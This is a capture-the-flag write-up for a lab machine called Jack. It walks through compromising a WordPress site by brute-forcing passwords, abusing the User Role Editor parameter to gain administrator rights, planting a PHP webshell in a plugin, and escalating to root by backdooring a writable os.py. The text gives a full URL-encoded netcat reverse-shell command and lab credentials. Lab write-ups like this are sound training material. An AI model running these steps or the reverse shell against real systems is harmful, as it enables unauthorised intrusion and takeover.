Jack

06a922d381893a3db54a051d45b0b33e.png

Target IP: 10.10.133.0
Challenge Description:
6a2bb97fa39062282bd6d35563865079.png


Reconnaissance

0686743e70ec84b92b0ea5bca098f345.png
The challenge mentions to insert the hostname jack.thm to my /etc/hosts file. I made the change to my /etc/hosts as shown above.

b99379edfb5a34b2b1eb25334cf83967.png
Performing a port scan shows there are two TCP ports open on the target machine: SSH and HTTP, as shown above. I am assuming the WordPress application runs on the port 80 on the target machine.

835374c85b433f6b8a8fda1cf1660184.png
Doing an aggressive port scan against the two open TCP ports returns the result above. The aggressive scan found the WordPress application and the disallowed entry /wp-admin inside the robots.txt. Time to perform a subdomain search now. After performing a subdomain search, it only managed to find the entry www. I made the change again to my /etc/hosts file.


Enumeration

Port 80: HTTP
c8a0970cac41f29e54b25aa56b72b91a.png
Browsing to port 80 displays the webpage above. In the image above, there is one post created by the user jack.

a6f32f2fc72536cf974af0633200d668.png
According to Wappalyzer, the target machine is running WordPress 5.3.2 version as shown above. Now I have more information about the web application.

e263b7bf8641a594f8a2dcf2cecff7c7.png
Using wpscan and the command wpscan --url http://jack.thm --enumerate u, ap, it managed to find the three usernames of the web application shown above. Maybe I can bruteforce their passwords?

c28ee7a51b5718982950b2431dd0423f.png
And bingo! I tried to bruteforce the passwords of the three users using rockyou.txt passwords file, but I had no luck even after thirty minutes. Then I switched to the fasttrack.txt and got a hit for the user wendy as shown above. Now I have the credentials wendy:changelater.

0ad51162bf9b189be61f330ff64ca981.png
I browsed to /wp-login page to login with the new bruteforced credentials.

b882e252b120cf3b5424df9164ef2b16.png
Now I have access to the WordPress application using the credentials of user wendy as shown above. However this user has low privileges as I am unable to change the theme, view the plugins, etc. I performed scans to detect any vulnerable plugins & themes, but I had no luck. I have hit a brickwall now.


Exploitation

eea26be1918c7eb1eb2d6d158701d436.png
After some online search, I found the web application could be vulnerable to the User Role Editor plugin. I found the interesting article above, maybe I can test it against the target machine?

685113dc51ae3c876ef7e67dc71cacd2.png
The article from the previous image mentions to intercept a request using Burpsuite after pressing the Update Profile button inside Your Profile section. Then I have to insert the &ure_other_roles=administrator and follow the redirects.

da16a7a9d79abfd52ecdb6676164ee56.png
After doing it, I now have administrator privileges as the user wendy on the WordPress application as shown above. Now I can change the themes to obtain a reverse shell connection. However, I had no luck when I tried to change the theme files with my PHP reverse shell. Time to enumerate harder.

7ab0fe99a9c6a27a6902067753f291ae.png
I notice there is akismet plugin installed. I inserted my PHP webshell inside the akismet.php at the beginning of the file, as shown above.

a137287b5ed272bb6210b7e40d7e35e9.png
And bingo! Now I can access my PHP webshell. I issued the commands ls;id;whoami and obtained the output above. Time to leverage this to a reverse shell connection. I started a listener on my machine at port 8443.

3dfe00993334723982d3cbdd64c6b2b1.png
Now I have a foothold on the target machine with the session as www-data as shown above. Using the PHP webshell, I issued the URL-encoded nc reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff.


Privilege Escalation

fe1d89f690f17de70750469a7c9209c1.png
After landing a shell on the target machine, I found a user called jack. This user has a file called reminder.txt, as shown above. Can I find the backup files?

2485e1db7fb2f6bdf93b5eea6ed6800b.png
I ran the command find / -name "*backup*" 2>/dev/null to find any file names that has backup in it. Doing this lead to the directory /var/backups as shown above. And this directory contains an SSH key.

162af92f10549da94a598c8240b612c2.png
Does this SSH key belong to the user jack? I made a copy of the SSH key on my machine and changed its permission to 400.

156836a3f91b7137776875b8e01ed346.png
And bingo! Using the SSH key, I managed to connect to the target machine as the user jack. I successfully elevated my privileges from www-data to jack as shown above.

2a3da16c87cd0f78f101fa784c2d95fd.png
I transferred pspy64 to the target machine and obtained the interesting result above. The Python application checker.py is being executed as the user root.

ddc590c7ca9613cca5f3384dd6e08ede.png
I browsed to /opt/statuscheck and found two files: checker.py and output.log. The content of checker.py is shown above. I cannot directly modify the Python file as I do not have enough privileges. Maybe I can edit the os module?

da6526b1aa1c9e30f8f26196857e0b15.png
Running the command find / -writable -type f 2>/dev/null shows /usr/lib/python2.7/os.py is writable!

33ad98127396e7e23d1afd2c3e772292.png
I inserted my Python reverse shell script inside the os.py at /usr/lib/python2.7 directory. The payload is inserted at the bottom of the file. And any calls to os are removed. Then I started a listener on my machine at port 8444.

b4e49eb13082c266f027566e0689a15e.png
And after waiting for a minute, I received a reverse shell connection on my machine at port 8444. Now I have root access on the target machine :)


Flags

ee1048f37ad01a012169d46083fb58a3.png
The user.txt flag is shown above. This flag is located at the home directory of the user jack.

c80dd5683ed204ee60f2d91fa4258a78.png
The root.txt flag is shown above. This flag is obtainable after exploiting the os.py module.